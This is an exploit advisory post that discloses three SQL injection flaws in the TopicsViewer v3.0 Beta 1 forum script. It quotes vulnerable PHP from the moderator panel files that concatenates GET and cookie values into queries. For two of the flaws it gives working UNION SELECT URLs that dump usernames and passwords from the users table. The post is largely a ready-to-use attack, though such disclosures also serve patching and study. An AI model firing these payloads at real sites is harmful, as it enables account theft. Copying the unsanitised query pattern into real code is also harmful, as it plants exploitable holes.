facebook facebook twitter rss

TopicsViewer Sql Injection Vulnerabilty

Author: jsass , Published: 05-03-2014
  ####################################################################
Exploit: TopicsViewer Sql Injection Vulnerabilty
Author: jsass
Contact Twitter: @Kwsecurity
Script: http://www.topicsviewer.com/
version: v 3.0 Beta 1
####################################################################
SQL INJECTION

(1)

modcp/edit_note.php

//////////////////////////////////
if(isset ($_GET['id']))
{
$title="ÊÚÏíá ãáÇÍÙå";
cp_title_bar ($title);
echo"<p>";
//--- Query ---//
$sql_q = "select * from notes where n_id = $_GET[id]";
$result_q = @mysql_query ($sql_q);
$note = @mysql_fetch_array ($result_q);
////////////////////////////////////
http://localhost/tp/upload/modcp/edit_note.php?id=1%20UNION%20SELECT%201,2,GROUP_concat%28u_name,0x3a,u_password%29,4,5+from%20users--%20-


(2)

modcp/main.php



/////////////////////////////////////////
if (!isset ($_POST[note]))
{
$title="ãáÇÍÙÇÊ ÇáãÔÑÝ";
open_a_table ($title);


$sql_note = "select u_msg from users where u_name = '$_COOKIE[mod]' or u_name = '$_SESSION[mod]' ;";
$res_note = @mysql_query ($sql_note);
$note = @mysql_fetch_array ($res_note);
$u_msg = $note[u_msg];
////////////////////////////////
http://localhost/tp/upload/modcp/main.php?op=home
post
note=1(injection)


(3)

modcp/rmv_topic.php

////////////////////////////////////
if(isset ($_GET['id']))

{
if (!empty ($_GET['id']))
{


$sql = "select * from topics where t_id = $_GET[id] LIMIT 1 ;";
$result = @mysql_query ($sql);
$topic = @mysql_fetch_array ($result);
$verify = @mysql_num_rows ($result);

http://localhost/tp/upload/modcp/rmv_topic.php?id=1%20%20UNION%20SELECT%201,GROUP_concat%28u_name,0x3a,u_password%29,3,4,5,6,7,8,9,10,11,12,13,14+FROM+users--%20-

/////////////////////////////////////////

Like us on Facebook :